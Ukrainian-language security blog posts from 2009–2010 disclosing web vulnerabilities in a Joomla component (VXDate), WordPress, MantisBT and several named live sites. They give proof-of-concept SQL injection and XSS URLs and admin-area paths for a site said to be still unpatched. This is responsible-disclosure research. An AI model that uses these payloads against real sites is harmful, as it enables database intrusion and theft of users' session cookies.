Websecurity - Веб безпека

12.01.2010

У травні, 10.05.2009, я знайшов Full path disclosure, SQL Injection та Cross-Site Scripting уразливості в компоненті VXDate (com_vxdate) для Joomla. Дані уразливості я виявив на одному веб сайті. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливість в JVClouds3D для Joomla.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

13.03.2010

Full path disclosure:

http://site/index.php?option=com_vxdate&ct=’

http://site/index.php?option=com_vxdate&ct=1&md=details&id=’

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’

SQL Injection:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5

XSS:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі потенційно всі версії VXDate.

В даній добірці уразливості в веб додатках:

• Vulnerability in yelp (деталі)
• Living CMS Cross-Site Scripting vulnerability (деталі)
• iNTERNET.cms Cross-Site Scripting vulnerability (деталі)
• iNTERNET.cms Cross-Site Scripting vulnerability (деталі)
• EXcms Root directory disclosure vulnerability (деталі)
• ELDORADO CMS Multiple Vulnerabilities (деталі)
• AKmedia CMS SQL Injection vulnerability (деталі)
• ABO.CMS Multiple Vulnerabilities (деталі)
• A.CMS Multiple Vulnerabilities (деталі)
• Neostrada Livebox Remote Network Down PoC Exploit (деталі)

У травні, 15.05.2007, я знайшов Cross-Site Scripting та Redirector уразливості на проекті http://adtime.ru (веб брокер). В даному випадку на http://r.adtime.ru. Про що найближчим часом сповіщу адміністрацію проекту.

XSS:

• alert(document.cookie)
• цікавий

Redirector:

http://r.adtime.ru/?http://websecurity.com.ua

24.09.2009

У лютому, 02.02.2009, я знайшов Cross-Site Scripting уразливості на проекті http://ftp-poisk.kiev.ua (пошуковець по ftp). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

11.03.2010

XSS (IE):

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

Дані уразливості вже виправлені.

У серпні, 19.08.2009, я знайшов Brute Force та Information Leakage уразливості на проекті http://banner.b-one.com.ua (банерна система). Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно дірок на сайтах банерних систем в останнє я писав про уразливості в багатьох банерних системах.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

В даній добірці уразливості в веб додатках:

• Security Notice for CA Service Desk (деталі)
• BMW ‘inventory.php”<= SQL Injection Vulnerability (деталі)
• QuickCart Multiple vlunerabilities (деталі)
• J2ME Security Vulnerabilities 2008 (деталі)
• UMI.CMS Cross-Site Scripting vulnerability (деталі)
• Tribiq CMS Multiple Vulnerabilities (деталі)
• Subrion CMS Multiple Vulnerabilities (деталі)
• Cetera CMS SQL Injection vulnerability (деталі)
• Neo CMS SQL Injection vulnerability (деталі)
• Aruba Mobility Controller Shared Default Certificate (деталі)

Раніше в 2008 році я вже писав про Brute Force уразливість в WordPress, що була виявлена Kad ще в 2007 році. Як я нещодавно перевірив в WordPress 2.9.2 дана уразливість досі не виправлена. А також я виявив нові уразливості в WP.

У березні, 02.03.2010, я знайшов Brute Force та Insufficient Authorization уразливості в WordPress.

Brute Force:

В функції захисту сторінок/записів паролем немає захисту від підбору паролю (від Brute Force атак).

Insufficient Authorization:

На кожну сторінку/запис в WP можна поставити пароль і ці паролі можуть співпадати. Але функція доступу по паролю записує глобальний кукіс, що працює одразу для всього сайту. І таким чином, вказавши один раз пароль для однієї сторінки/запису, можна подивитися всі запаролені сторінки/записи (с таким самим паролем, навіть не знаючи, що пароль співпадає), бо при запиті до них, доступ автоматично буде наданий.

В даному випадку є дві побічні дії:

1. У випадку коли є декілька сторінок з одним паролем (наприклад, окремий розділ сайта), то ця функціональність буде зручною, бо можна ввести пароль один раз і отримати доступ одразу до всіх сторінок з цим паролем.

2. У випадку коли є різні сторінки з різними паролями, то це приведе до незручностей, коли буде запам’ятований лише останній пароль і до інших сторінок (з іншими паролями) протрібно буде весь час вводити паролі.

Уразливі WordPress 2.9.2 та попередні версії (всі 2.х версії). Перевірив в різних версіях WP, зокрема в 2.0.11 та 2.9.2.

29.08.2009

У січні, 09.01.2009, я знайшов Full path disclosure, Insufficient Anti-automation та Cross-Site Scripting уразливості на проекті http://zhelem.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

09.03.2010

Full path disclosure:

http://zhelem.com/cgi-bin/nb/admin/index.php?lang=1

http://zhelem.com/cgi-bin/nb/admin/pwlost.php?lang=1

http://zhelem.com/cgi-bin/nb/admin/usered.php?lang=1&mode=comment&input_entrynr=44&entrylang=en

Insufficient Anti-automation:

http://zhelem.com/cgi-bin/nb/admin/usered.php?lang=en&mode=comment&input_entrynr=44&entrylang=en

Логін і пароль фіксовані та задані на сторінці.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

У серпні, 18.08.2009, я виявив Cross-Site Request Forgery, Full path disclosure та Denial of Service уразливості в Mantis (MantisBT). Уразливості виявив на одному сайті, який використовує дану систему. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

В даній добірці уразливості в веб додатках:

• EMC Dantz Retrospect 7 backup Client PlainText Password Hash Disclosure Vulnerability (деталі)
• EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory corruption Vulnerability (деталі)
• EMC Dantz Retrospect 7 backup Server Authentication Module Weak Password Hash Arithmetic Vulnerability (деталі)
• EMC Dantz Retrospect 7 backup Client 7.5.116 NULL-Pointer reference Denial of Service Vulnerability (деталі)
• Jetty Persistent XSS in Sample Cookies Application (деталі)
• Remote File Inclusion In AIOCP (деталі)
• IronPort Encryption Appliance / PostX and PXE Encryption Vulnerabilities (деталі)
• Docebo Multiple SQL-Injection Vulnerabilities (деталі)
• vBulletin - Multiple Versions - Cross Site Script Redirection (деталі)
• DreamPoll 3.1 Vulnerabilities (деталі)